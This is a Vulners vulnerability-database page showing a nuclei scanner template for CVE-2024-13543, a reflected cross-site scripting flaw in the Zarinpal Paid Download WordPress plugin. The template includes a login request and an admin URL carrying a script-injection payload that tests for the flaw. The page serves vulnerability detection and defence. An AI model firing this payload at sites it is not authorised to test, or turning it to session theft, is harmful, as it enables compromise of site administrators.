Lucene search
K

Zarinpal Paid Download - Reflected XSS

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Reflected XSS in Zarinpal Paid Download plugin v2.3 enables admin context scripts via a crafted link.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13543
11 Feb 202506:10
circl
CVE
CVE-2024-13543
11 Feb 202506:00
cve
Cvelist
CVE-2024-13543 Zarinpal Paid Downloads <= 2.3 - Reflected XSS
11 Feb 202506:00
cvelist
EUVD
EUVD-2024-51663
3 Oct 202520:07
euvd
NVD
CVE-2024-13543
11 Feb 202506:15
nvd
OSV
CVE-2024-13543
11 Feb 202506:15
osv
Positive Technologies
PT-2025-6158
11 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13543
13 Feb 202511:18
redhatcve
Vulnrichment
CVE-2024-13543 Zarinpal Paid Downloads <= 2.3 - Reflected XSS
11 Feb 202506:00
vulnrichment
Wordfence Blog
Wordfence Intelligence Weekly WordPress Vulnerability Report (January 20, 2025 to January 26, 2025)
30 Jan 202516:04
wordfence
Rows per page
id: CVE-2024-13543

info:
  name: Zarinpal Paid Download - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Zarinpal Paid Download WordPress plugin v2.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/04a545c4-75d3-4672-8530-00bb879991ca/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13543
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13543
    cwe-id: CWE-79
    epss-score: 0.00564
    epss-percentile: 0.42765
    cpe: cpe:2.3:a:amini7:zarinpal_paid_download:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: amini7
    product: zarinpal_paid_download
  tags: cve,cve2024,amini7,zarinpal-paid-download,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=paid-downloads-add&ty=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","zarinpal-paid-download")
        condition: and
# digest: 4a0a0047304502203a4726f81d9a770eda71d34503ca089a016f667cac174980c5f93bc5e293a0d5022100cb57b4b930daadc6880da08ed683b9d3252cd2b3b31692ad06fd95eeb561722d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 05:52Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00564
SSVC
11